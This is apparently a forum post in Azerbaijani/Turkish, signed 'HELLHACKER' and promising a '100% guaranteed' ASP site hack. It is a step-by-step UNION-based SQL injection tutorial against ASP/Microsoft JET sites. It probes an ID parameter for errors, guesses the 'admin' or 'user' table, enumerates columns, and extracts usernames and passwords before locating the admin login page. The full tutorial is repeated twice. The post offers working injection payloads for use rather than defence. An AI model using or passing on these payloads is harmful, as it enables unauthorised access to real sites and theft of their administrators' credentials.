Asp site hack - 100 garanti!
Sayt: www.xxx.com /view.asp?ID=1
1. Asp saytlarda saytin sonuna mesela: www.xxx.com /view.asp?ID=1-dise, 1'a edirik.
2. Eger xata bildirdise meselen Microsoft JET Database engine error "8033546"
Syntaxis error (missing operator) in guery expression 'ID=1"a'.
/ viewnew.asp, line 20
3.bu kodu 1-i silib yerine yaziriq ------> 99 union+select+0+from+admin
4.Yazandan sonra ---->Error Table "admin"-----> gibi bikac sey yazsa o degige herslenmeyin....
5. Bu zaman biz bileceyik ki kodumuz dogrudur ve bu saytda sifreler ve istifadesilerin adlari "Table"da saxlanir.
6. kodun uzerinde biraz oynayirig....bax bele: 99 union+select+0+from+admin -----> admini--user,users,admins ves. yoxlayin...
eyer tutsa onda bele error vercek------>...selected tabels query in union query do not match.
7.Demek ki, biz table'deke sutun adinin 'user' oldugunu bildik, indi galdi onun hansi sutundan istifade etdiyini bilmeye:
bax bele---->99 union+select+0+from+user
99 union+select+0,1+from+user
99 union+select+0,1,3+from+user --->ta ki tutana geder.
8.tutanda meselen ------> 99 union+select+0,1,3,4+from+user ---->bunda tutdusa o zaman bize hemin regemi yeni 4-u gosterecek...
9. ------> 99 union+select+0,1,3,4+from+user ---> burada 4 yerine sutunun adini yaziriq meselen user,name kimi......
10. ------> 99 union+select+0,1,3,4+from+user ---> bele olur 99 union+select+0,1,3,name+from+user (4-name ile deyisdirilir.)---ve bu zaman istifadeci adini bize verir...meselen: Admin.
11.Indi isimiz galdi sifreye....onu da bele edirik!----> 99 union+select+0,1,3,name+from+user--->burada 1,2,3 - u yoxlayiriq -- pass,password ----> yeni bele edirik ----> 99 union+select+0,1,password,name+from+user ------> iste sifre ve istifadeci adi.....
12. is galdi sitenin admin girishini tapmaga. o da saytdan sayta ferg edir. Meselen: www.xxx.com/admin....www.xxx.com/admin/admin.asp
Qeyd: 99'lardan evvel - isareti goyun!
Hormetlerimle...HELLHACKER!:diablo
Sayt: www.xxx.com /view.asp?ID=1
1. Asp saytlarda saytin sonuna mesela: www.xxx.com /view.asp?ID=1-dise, 1'a edirik.
2. Eger xata bildirdise meselen Microsoft JET Database engine error "8033546"
Syntaxis error (missing operator) in guery expression 'ID=1"a'.
/ viewnew.asp, line 20
3.bu kodu 1-i silib yerine yaziriq ------> 99 union+select+0+from+admin
4.Yazandan sonra ---->Error Table "admin"-----> gibi bikac sey yazsa o degige herslenmeyin....
5. Bu zaman biz bileceyik ki kodumuz dogrudur ve bu saytda sifreler ve istifadesilerin adlari "Table"da saxlanir.
6. kodun uzerinde biraz oynayirig....bax bele: 99 union+select+0+from+admin -----> admini--user,users,admins ves. yoxlayin...
eyer tutsa onda bele error vercek------>...selected tabels query in union query do not match.
7.Demek ki, biz table'deke sutun adinin 'user' oldugunu bildik, indi galdi onun hansi sutundan istifade etdiyini bilmeye:
bax bele---->99 union+select+0+from+user
99 union+select+0,1+from+user
99 union+select+0,1,3+from+user --->ta ki tutana geder.
8.tutanda meselen ------> 99 union+select+0,1,3,4+from+user ---->bunda tutdusa o zaman bize hemin regemi yeni 4-u gosterecek...
9. ------> 99 union+select+0,1,3,4+from+user ---> burada 4 yerine sutunun adini yaziriq meselen user,name kimi......
10. ------> 99 union+select+0,1,3,4+from+user ---> bele olur 99 union+select+0,1,3,name+from+user (4-name ile deyisdirilir.)---ve bu zaman istifadeci adini bize verir...meselen: Admin.
11.Indi isimiz galdi sifreye....onu da bele edirik!----> 99 union+select+0,1,3,name+from+user--->burada 1,2,3 - u yoxlayiriq -- pass,password ----> yeni bele edirik ----> 99 union+select+0,1,password,name+from+user ------> iste sifre ve istifadeci adi.....
12. is galdi sitenin admin girishini tapmaga. o da saytdan sayta ferg edir. Meselen: www.xxx.com/admin....www.xxx.com/admin/admin.asp
Qeyd: 99'lardan evvel - isareti goyun!
Hormetlerimle...HELLHACKER!:diablo
Son düzenleme:
